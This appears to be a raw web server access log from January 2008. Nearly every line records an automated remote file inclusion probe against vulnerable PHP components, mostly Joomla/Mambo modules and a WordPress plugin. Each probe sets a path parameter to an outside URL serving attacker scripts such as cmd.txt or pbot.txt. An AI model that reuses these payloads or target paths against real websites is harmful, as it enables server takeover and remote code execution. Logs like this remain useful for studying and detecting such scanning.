200.206.143.90 - - [12/Jan/2008:13:46:05 -0800] "GET /logs/access_%3Cwbr%20///administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://rmk.se/bilder/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
74.52.170.162 - - [12/Jan/2008:13:46:07 -0800] "GET /logs/access_070812.log//modules/vwar/admin/admin.php?vwar_root=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 298 "-" "libwww-perl/5.808" "www.projectpr.com"
74.52.170.162 - - [12/Jan/2008:13:46:07 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
200.206.143.90 - - [12/Jan/2008:13:46:44 -0800] "GET /logs/access_%3Cwbr%20/%3E070912.log///administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://rmk.se/bilder/djd1.txt??? HTTP/1.1" 404 347 "-" "libwww-perl/5.803" "www.projectpr.com"
200.206.143.90 - - [12/Jan/2008:13:46:44 -0800] "GET ///administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://rmk.se/bilder/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
200.206.143.90 - - [12/Jan/2008:13:46:45 -0800] "GET /logs/access_%3Cwbr%20///administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://rmk.se/bilder/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
74.53.58.15 - - [12/Jan/2008:13:47:02 -0800] "GET /logs/access_070812.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://seucu.us/pbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.53.58.15 - - [12/Jan/2008:13:47:02 -0800] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://seucu.us/pbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
200.206.143.90 - - [12/Jan/2008:13:47:13 -0800] "GET /logs/access_%3Cwbr%20/%3E070912.log///administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://rmk.se/bilder/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
200.206.143.90 - - [12/Jan/2008:13:47:13 -0800] "GET ///administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://rmk.se/bilder/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
200.206.143.90 - - [12/Jan/2008:13:47:14 -0800] "GET /logs/access_%3Cwbr%20///administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://rmk.se/bilder/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
91.121.1.47 - - [12/Jan/2008:13:51:25 -0800] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://slcdelivery.com/banners/frame.jpg?? HTTP/1.1" 404 305 "-" "libwww-perl/5.803" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:13:52:04 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:13:52:05 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 289 "-" "libwww-perl/5.808" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:13:52:05 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:13:52:13 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:13:52:14 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:13:52:14 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
200.206.143.90 - - [12/Jan/2008:13:53:09 -0800] "GET /logs/access_%3Cwbr%20/%3E071012.log///administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://rmk.se/bilder/djd1.txt??? HTTP/1.1" 404 347 "-" "libwww-perl/5.803" "www.projectpr.com"
200.206.143.90 - - [12/Jan/2008:13:53:15 -0800] "GET /logs/access_%3Cwbr%20/%3E071012.log///administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://rmk.se/bilder/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
200.206.143.90 - - [12/Jan/2008:13:53:17 -0800] "GET /logs/access_%3Cwbr%20/%3E071012.log///administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://rmk.se/bilder/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
80.203.157.250 - - [12/Jan/2008:13:56:46 -0800] "GET /logs/access_071112.log//?mosConfig_live_site=http://rapidgets.org/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
91.121.1.47 - - [12/Jan/2008:14:00:09 -0800] "GET /logs/access_070812.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://slcdelivery.com/banners/frame.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
91.121.1.47 - - [12/Jan/2008:14:00:09 -0800] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://slcdelivery.com/banners/frame.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
74.52.9.218 - - [12/Jan/2008:14:01:35 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.aneuk.com/cmd.txt?? HTTP/1.1" 404 287 "-" "libwww-perl/5.65" "www.projectpr.com"
69.10.135.176 - - [12/Jan/2008:14:04:22 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.fachin-friedrich.de/contenido/external/frontend/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.19.90 - - [12/Jan/2008:14:07:01 -0800] "GET /logs/access_070712.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.19.90 - - [12/Jan/2008:14:07:02 -0800] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.19.90 - - [12/Jan/2008:14:07:02 -0800] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 299 "-" "libwww-perl/5.808" "www.projectpr.com"
216.246.61.117 - - [12/Jan/2008:14:08:36 -0800] "GET /logs/access_070812.log/components/com_simpleboard/image_upload.php?sbp=http://blueislandestates.com/Pics/mlr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
216.246.61.117 - - [12/Jan/2008:14:08:36 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://blueislandestates.com/Pics/mlr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
216.246.61.117 - - [12/Jan/2008:14:08:36 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://blueislandestates.com/Pics/mlr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
64.38.19.90 - - [12/Jan/2008:14:09:56 -0800] "GET /logs/access.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.53.58.15 - - [12/Jan/2008:14:10:26 -0800] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://seucu.us/pbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.132.157 - - [12/Jan/2008:14:11:52 -0800] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.fieldhockey.be/site/login? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.projectpr.com"
205.234.132.157 - - [12/Jan/2008:14:11:52 -0800] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.fieldhockey.be/site/login? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.projectpr.com"
64.38.19.90 - - [12/Jan/2008:14:12:22 -0800] "GET /logs/access_070612.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:14:12:43 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:14:12:43 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:14:12:43 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.34.201.90 - - [12/Jan/2008:14:14:07 -0800] "GET /logs/access_070712.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
64.34.201.90 - - [12/Jan/2008:14:14:07 -0800] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
64.34.201.90 - - [12/Jan/2008:14:14:08 -0800] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
67.192.48.155 - - [12/Jan/2008:14:15:15 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
67.192.48.155 - - [12/Jan/2008:14:15:16 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
64.34.201.90 - - [12/Jan/2008:14:15:29 -0800] "GET /logs/access.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
193.142.215.14 - - [12/Jan/2008:14:15:44 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
193.142.215.14 - - [12/Jan/2008:14:15:45 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
91.121.92.203 - - [12/Jan/2008:14:18:04 -0800] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.geocities.com/bujankgilo/command.txt? HTTP/1.1" 404 305 "-" "libwww-perl/5.803" "www.projectpr.com"
69.10.135.176 - - [12/Jan/2008:14:21:18 -0800] "GET /logs/access_070812.log//modules/vwar/admin/admin.php?vwar_root=http://www.fachin-friedrich.de/contenido/external/frontend/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.10.135.176 - - [12/Jan/2008:14:21:18 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.fachin-friedrich.de/contenido/external/frontend/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
128.103.8.13 - - [12/Jan/2008:14:21:53 -0800] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.newstanis.it/administrator/components/com_comprofiler/rss? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
128.103.8.13 - - [12/Jan/2008:14:22:01 -0800] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.newstanis.it/administrator/components/com_comprofiler/rss? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
128.103.8.13 - - [12/Jan/2008:14:22:09 -0800] "GET /logs/access_070712.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.newstanis.it/administrator/components/com_comprofiler/rss? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
192.220.109.46 - - [12/Jan/2008:14:22:38 -0800] "GET //modules/xfsection/modify.php?dir_module=http://mtin.info/tiny_includes/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
128.103.8.13 - - [12/Jan/2008:14:23:06 -0800] "GET /logs/access_070812.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.newstanis.it/administrator/components/com_comprofiler/rss? HTTP/1.1" 404 304 "-" "libwww-perl/5.79" "www.projectpr.com"
208.122.223.146 - - [12/Jan/2008:14:23:12 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.skd.it/vwar/admin/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.122.223.146 - - [12/Jan/2008:14:23:13 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.skd.it/vwar/admin/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.122.223.146 - - [12/Jan/2008:14:23:13 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.skd.it/vwar/admin/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.19.90 - - [12/Jan/2008:14:23:41 -0800] "GET /logs/access_070812.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
91.121.92.203 - - [12/Jan/2008:14:27:14 -0800] "GET /logs/access_070812.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.geocities.com/bujankgilo/command.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
91.121.92.203 - - [12/Jan/2008:14:27:15 -0800] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.geocities.com/bujankgilo/command.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
80.249.117.99 - - [12/Jan/2008:14:28:08 -0800] "GET /logs/access_071012.log/index2.php?x=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
80.249.117.99 - - [12/Jan/2008:14:28:08 -0800] "GET /index2.php?x=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
80.249.117.99 - - [12/Jan/2008:14:28:09 -0800] "GET /logs/index2.php?x=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
66.225.223.4 - - [12/Jan/2008:14:29:16 -0800] "GET /logs/access_071012.log/index2.php?x=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
66.225.223.4 - - [12/Jan/2008:14:29:16 -0800] "GET /index2.php?x=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.805" "www.projectpr.com"
66.225.223.4 - - [12/Jan/2008:14:29:16 -0800] "GET /logs/index2.php?x=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
91.121.1.47 - - [12/Jan/2008:14:30:02 -0800] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://slcdelivery.com/banners/frame.jpg?? HTTP/1.1" 404 321 "-" "libwww-perl/5.803" "www.projectpr.com"
64.38.19.90 - - [12/Jan/2008:14:31:44 -0800] "GET /logs/access_071112.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.249.70.107 - - [12/Jan/2008:14:33:44 -0800] "GET /clipart/images/sidebars/ HTTP/1.1" 200 715 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
128.103.8.13 - - [12/Jan/2008:14:33:48 -0800] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.newstanis.it/administrator/components/com_comprofiler/rss? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.projectpr.com"
128.103.8.13 - - [12/Jan/2008:14:33:48 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.newstanis.it/administrator/components/com_comprofiler/rss? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.projectpr.com"
67.192.48.155 - - [12/Jan/2008:14:38:17 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 289 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
67.192.48.155 - - [12/Jan/2008:14:38:17 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
193.142.215.14 - - [12/Jan/2008:14:38:20 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
193.142.215.14 - - [12/Jan/2008:14:38:30 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
66.225.246.160 - - [12/Jan/2008:14:41:43 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.225.246.160 - - [12/Jan/2008:14:41:43 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.225.246.160 - - [12/Jan/2008:14:41:44 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.93.83.98 - - [12/Jan/2008:14:42:16 -0800] "GET /logs/access.log/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.mee.chu.edu.tw/images/red.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.projectpr.com"
69.93.83.98 - - [12/Jan/2008:14:42:16 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.mee.chu.edu.tw/images/red.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.projectpr.com"
69.93.83.98 - - [12/Jan/2008:14:42:17 -0800] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.mee.chu.edu.tw/images/red.gif????????????????????????????? HTTP/1.1" 404 304 "-" "libwww-perl/5.63" "www.projectpr.com"
69.93.83.98 - - [12/Jan/2008:14:42:25 -0800] "GET /logs/access_070712.log/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.mee.chu.edu.tw/images/red.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.projectpr.com"
65.74.150.192 - - [12/Jan/2008:14:44:39 -0800] "GET //modules/xfsection/modify.php?dir_module=http://canalpt.net/catalog/images/12.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
208.179.140.215 - - [12/Jan/2008:14:45:09 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.newstanis.it/administrator/components/com_comprofiler/rss? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.projectpr.com"
208.179.140.215 - - [12/Jan/2008:14:45:09 -0800] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.newstanis.it/administrator/components/com_comprofiler/rss? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.projectpr.com"
207.44.188.10 - - [12/Jan/2008:14:46:45 -0800] "GET //skin/zero_vote/error.php?dir=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.projectpr.com"
207.44.188.10 - - [12/Jan/2008:14:46:46 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.projectpr.com"
72.232.23.237 - - [12/Jan/2008:14:54:19 -0800] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.232.23.237 - - [12/Jan/2008:14:54:19 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.232.23.237 - - [12/Jan/2008:14:54:20 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
91.121.92.203 - - [12/Jan/2008:14:54:40 -0800] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.geocities.com/bujankgilo/command.txt? HTTP/1.1" 404 321 "-" "libwww-perl/5.803" "www.projectpr.com"
89.149.208.203 - - [12/Jan/2008:14:55:49 -0800] "GET /logs/access.log/classifieds/config.inc.php?path_escape=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
89.149.208.203 - - [12/Jan/2008:14:55:49 -0800] "GET /classifieds/config.inc.php?path_escape=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 272 "-" "libwww-perl/5.79" "www.projectpr.com"
